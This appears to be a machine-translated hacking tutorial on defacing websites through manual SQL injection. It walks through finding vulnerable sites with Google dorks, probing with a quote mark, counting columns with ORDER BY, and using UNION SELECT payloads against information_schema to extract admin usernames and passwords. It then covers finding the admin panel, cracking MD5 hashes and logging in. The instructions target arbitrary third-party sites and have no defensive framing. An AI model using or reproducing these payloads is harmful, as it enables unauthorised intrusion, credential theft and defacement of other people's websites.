How to Deface With Web SQL Manual

                How to Deface With Web SQL Manual

1. You are looking at a target in deface web for use dork. You can find  HERE.

2. Type the dork in google search box, it will show up a lot in the web search results. Please open one 3. Add character ' at the end url'nya to know vulnerability'nya Example: www.site.com/news.php?id=32 ' 4. If it says like "syntax error" means the vuln web alias can we deface the error Example: warning: mysql_fetch_array (): supplied argument is not a valid MySQL result resource in D: \ inetpub \ wwwroot \ ajpower.net \ html \ news. php on line 5. Sekarangnya time for us to act. Find the number of tables available on the web database by adding characters + order + by +1- - behind the url Example: www.site.com/news.php?id=32+ order + by +1- -you try one writing by one until the error. Example Letting the number of web table 4 (the error in 4) 6. Then we use the union to issue a number which we will use. Add + union + select +1,2,3,4 - Example: www.site.com/news.php?id=32 + union + select +1,2,3,4 - I suppose that comes out number 3 7. Now enter the version () in figure 3 to explain the version Example:  www.site.com/news.php?id=32 + union + select +1.2,version () ,4 - 8. We come up with the name - the name of an existing table on the web by entering the command table_name in figures 3 and command + from + information_schema.tables-- behind the urlExample:  www.site.com/news.php?id=32 + union + select + 1,2, table_name , 4 + from + information_schema.tables-- Later we will see that the table names on the web 9. We see that the content is in the table by entering the command group_concat (table_name) in figures 3 and command + where + table_schema = database () - at the end of the url Example Next we remove the existing contents in the table (column) by entering the command group_concat (column_name) in figures 3 and + from + where + table_name information_schema.columns + = 0xHasilConvertTextTableAdmin - at the end of the url for these 10 steps to convert it first please table'nya text to hexadecimal name  here So suppose table'nya last nameadmin then if will convert into 61646D696E Example column will appear that contains a username and password 11. Then we look at the contents of the column that we find. I suppose tablenya name is admin, and the contents of the table is a column admin username and password. Then enter the command concat_ws (0x3a, "the name of an existing column in the table admin") at number 3 and command + from + admin - at the end of the url Example:   www.site.com/news.php?id=32 + union + select +1.2, concat_ws (0x3a, "username, password") , 4 + from + admin - 12. Then we will see the admin username and password from the web. Time for us to execute. 13. Search admin page for it, usually by adding the following text at the end of the target web url. / admin / , / administrator / , / webadmin / , / adm / , / webbase / Example: www.site.com/admin/ Now fill in your username and password was in the can. If MD5 passwords shaped like e10adc3949ba59abbe56e057f20f883e, you first crack  here It is not as easy as turning the palm of the hand, learn a little bit.